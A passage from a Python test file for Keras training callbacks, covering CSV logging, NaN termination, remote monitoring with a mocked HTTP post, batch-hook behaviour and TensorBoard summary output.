self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegex(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
# On Windows, due to \r\n line ends, we may end up reading empty lines
# after each line. Skip empty lines.
values = [x for x in csv.reader(f) if x]
assert 'nan' in values[-1], 'The last epoch was not logged.'
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_TerminateOnNaN(self):
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertTrue(np.isnan(loss[0]) or np.isinf(loss[0]))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitor_np_array(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.arange(1) # a 1 by 1 array
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitor_np_float32(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.float32(1.0) # a float32 generic type
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 1.0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with tf.compat.v1.test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
def test_progbar_infers_steps(self):
x, y = np.ones((10, 1)), np.ones((10, 1))
data = tf.data.Dataset.from_tensor_slices((x, y)).batch(2)
data = data.filter(lambda x, y: True) # Unknown cardinality.
progbar = keras.callbacks.ProgbarLogger('steps')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
self.assertIsNone(progbar.target)
model.fit(data, epochs=2, callbacks=[progbar])
self.assertEqual(progbar.target, 5)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_callback_passed_floats(self):
class MyCallback(keras.callbacks.Callback):
def on_batch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_batch_end_called = True
def on_epoch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_epoch_end_called = True
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
callback = MyCallback()
model.fit(x, y, epochs=2, callbacks=[callback])
self.assertTrue(callback.on_batch_end_called)
self.assertTrue(callback.on_batch_end_called)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks(self):
class MyCallbackWithBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
class MyCallbackWithTFBatchHooks(keras.callbacks.Callback):
def __init__(self):
super(MyCallbackWithTFBatchHooks, self).__init__()
self._supports_tf_logs = True
class MyCallbackWithoutBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.epochs = 0
def on_epoch_end(self, epoch, logs=None):
self.epochs += 1
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallbackWithBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
self.assertFalse(cb_list._batch_hooks_support_tf_logs)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallbackWithTFBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._batch_hooks_support_tf_logs)
my_cb = MyCallbackWithoutBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertLen(cb_list.callbacks, 1)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_logs_conversion(self):
assert_dict_equal = self.assertDictEqual
class MutateNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['numpy'] = 1
class MutateTensorFlowLogs(CallAllHooks):
def __init__(self):
super(MutateTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['tf'] = 2
class AssertNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
assert_dict_equal(logs, {'all': 0, 'numpy': 1, 'tf': 2})
class AssertTensorFlowLogs(AssertNumpyLogs):
def __init__(self):
super(AssertTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
cb_list = keras.callbacks.CallbackList([
MutateNumpyLogs(),
MutateTensorFlowLogs(),
AssertNumpyLogs(),
AssertTensorFlowLogs()
])
assert len(cb_list.callbacks) == 4
cb_list.on_epoch_begin(0, logs={'all': 0})
cb_list.on_epoch_end(0, logs={'all': 0})
cb_list.on_predict_batch_begin(0, logs={'all': 0})
cb_list.on_predict_batch_end(0, logs={'all': 0})
cb_list.on_predict_begin(logs={'all': 0})
cb_list.on_predict_end(logs={'all': 0})
cb_list.on_test_batch_begin(0, logs={'all': 0})
cb_list.on_test_batch_end(0, logs={'all': 0})
cb_list.on_test_begin(logs={'all': 0})
cb_list.on_test_end(logs={'all': 0})
cb_list.on_train_batch_begin(0, logs={'all': 0})
cb_list.on_train_batch_end(0, logs={'all': 0})
cb_list.on_train_begin(logs={'all': 0})
cb_list.on_train_end(logs={'all': 0})
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks_override(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self, should_run=True):
self.should_run = should_run
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
def _implements_train_batch_hooks(self):
return self.should_run
def _implements_test_batch_hooks(self):
return self.should_run
def _implements_predict_batch_hooks(self):
return self.should_run
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallback(should_run=True)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallback(should_run=False)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 0)
self.assertEqual(my_cb.test_batches, 0)
self.assertEqual(my_cb.predict_batches, 0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_default_callbacks_do_not_call_batch_hooks(self):
model = keras.Sequential([keras.layers.Dense(1)])
log_dir = self.get_temp_dir()
cb_list = keras.callbacks.CallbackList([
keras.callbacks.TensorBoard(log_dir, profile_batch=0),
keras.callbacks.ModelCheckpoint(log_dir),
],
add_progbar=True,
model=model,
verbose=2,
epochs=3)
self.assertLen(cb_list.callbacks, 3)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_change_tf_functions_during_fit(self):
class ChangeFunctions(keras.callbacks.Callback):
def on_epoch_end(self, epochs, logs=None):
def new_fn(iterator):
raise ValueError('New function substituted successfully.')
self.model.train_function = new_fn
self.model.test_function = new_fn
self.model.predict_function = new_fn
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
with self.assertRaisesRegexp(ValueError, 'New function '):
model.fit(x, y, batch_size=2, epochs=2, callbacks=[ChangeFunctions()])
with self.assertRaisesRegexp(ValueError, 'New function '):
model.evaluate(x, y, batch_size=2)
with self.assertRaisesRegexp(ValueError, 'New function '):
model.predict(x, batch_size=2)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_stop_training_batch_level(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self):
super(MyCallback, self).__init__()
self.batch_counter = 0
def on_train_batch_end(self, batch, logs=None):
self.batch_counter += 1
if batch == 2:
self.model.stop_training = True
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
my_cb = MyCallback()
# Will run 5 batches if `stop_training` doesn't work.
model.fit(x, y, batch_size=2, callbacks=[my_cb])
self.assertEqual(my_cb.batch_counter, 3)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_built_in_callback_order(self):
class CustomCallback(keras.callbacks.Callback):
pass
class TestingCallbackList(keras.callbacks.CallbackList):
def __init__(self, *args, **kwargs):
super(TestingCallbackList, self).__init__(*args, **kwargs)
if ((not isinstance(self.callbacks[0], CustomCallback)) or
(not isinstance(self.callbacks[1], keras.callbacks.History)) or
(not isinstance(self.callbacks[2], keras.callbacks.ProgbarLogger))):
raise AssertionError(f'Callback order unexpected: {self.callbacks}')
with mock.patch.object(
keras.callbacks, 'CallbackList', TestingCallbackList):
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
custom_callback = CustomCallback()
model.fit(np.ones((10, 10)), np.ones((10, 1)), epochs=5,
callbacks=[custom_callback])
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile:
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
self.graph_defs = []
self.convert_from_v2_summary_proto = False
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains an summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, _, filenames) in os.walk(logdir):
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in tf.compat.v1.train.summary_iterator(path):
if event.graph_def:
result.graph_defs.append(event.graph_def)
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
elif kind == 'tensor' and tag != 'keras':
# Convert the tf2 summary proto to old style for type checking.
plugin_name = value.metadata.plugin_data.plugin_name
container = {
'images': result.images,
'histograms': result.histograms,
'scalars': result.scalars,
}.get(plugin_name)
if container is not None:
result.convert_from_v2_summary_proto = True
else:
container = result.tensors
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self, compile_model=True):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
if compile_model:
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=validation_dir, tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, _, filenames) in os.walk(self.train_dir):
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
def test_TensorBoard_learning_rate_schedules(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[keras.callbacks.TensorBoard(self.logdir)])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
},
)
def test_TensorBoard_global_step(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
verbose=0,
callbacks=[
keras.callbacks.TensorBoard(
self.logdir,
update_freq=1,
profile_batch=0,
write_steps_per_second=True)
])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
_ObservedSummary(
logdir=self.train_dir, tag='epoch_steps_per_second'),
_ObservedSummary(
logdir=self.train_dir, tag='batch_steps_per_second'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
if summary_file.convert_from_v2_summary_proto:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
}
else:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
}
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
expected
)
def test_TensorBoard_projector_callback(self):
layers = [
keras.layers.Embedding(10, 10, name='test_embedding'),
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
optimizer='adam',
loss=keras.losses.BinaryCrossentropy(from_logits=True),
run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10)), np.ones((10, 10))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir,
embeddings_freq=1,
embeddings_metadata={'test_embedding': 'metadata.tsv'})
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
with open(os.path.join(self.logdir, 'projector_config.pbtxt')) as f:
self.assertEqual(f.readlines(), [
'embeddings {\n',
(' tensor_name: '
'"layer_with_weights-0/embeddings/.ATTRIBUTES/VARIABLE_VALUE"\n'),
' metadata_path: "metadata.tsv"\n', '}\n'
])
def test_custom_summary(self):
if not tf.executing_eagerly():
self.skipTest('Custom summaries only supported in V2 code path.')
def scalar_v2_mock(name, data, step=None):
"""A reimplementation of the scalar plugin to avoid circular deps."""
metadata = tf.compat.v1.SummaryMetadata()
# Should match value in tensorboard/plugins/scalar/metadata.py.
metadata.plugin_data.plugin_name = 'scalars'
with tf.summary.experimental.summary_scope(
name, 'scalar_summary', values=[data, step]) as (tag, _):
return tf.summary.write(
tag=tag,
tensor=tf.cast(data, 'float32'),
step=step,
metadata=metadata)
class LayerWithSummary(keras.layers.Layer):
def call(self, x):
scalar_v2_mock('custom_summary', tf.reduce_sum(x))
return x
model = testing_utils.get_model_from_layers([LayerWithSummary()],
input_shape=(5,),
name='model')
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
x, y = np.ones((10, 5)), np.ones((10, 5))
model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
_ObservedSummary(
logdir=self.train_dir,
tag='model/layer_with_summary/custom_summary'),
_ObservedSummary(
logdir=self.validation_dir,
tag='model/layer_with_summary/custom_summary')
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
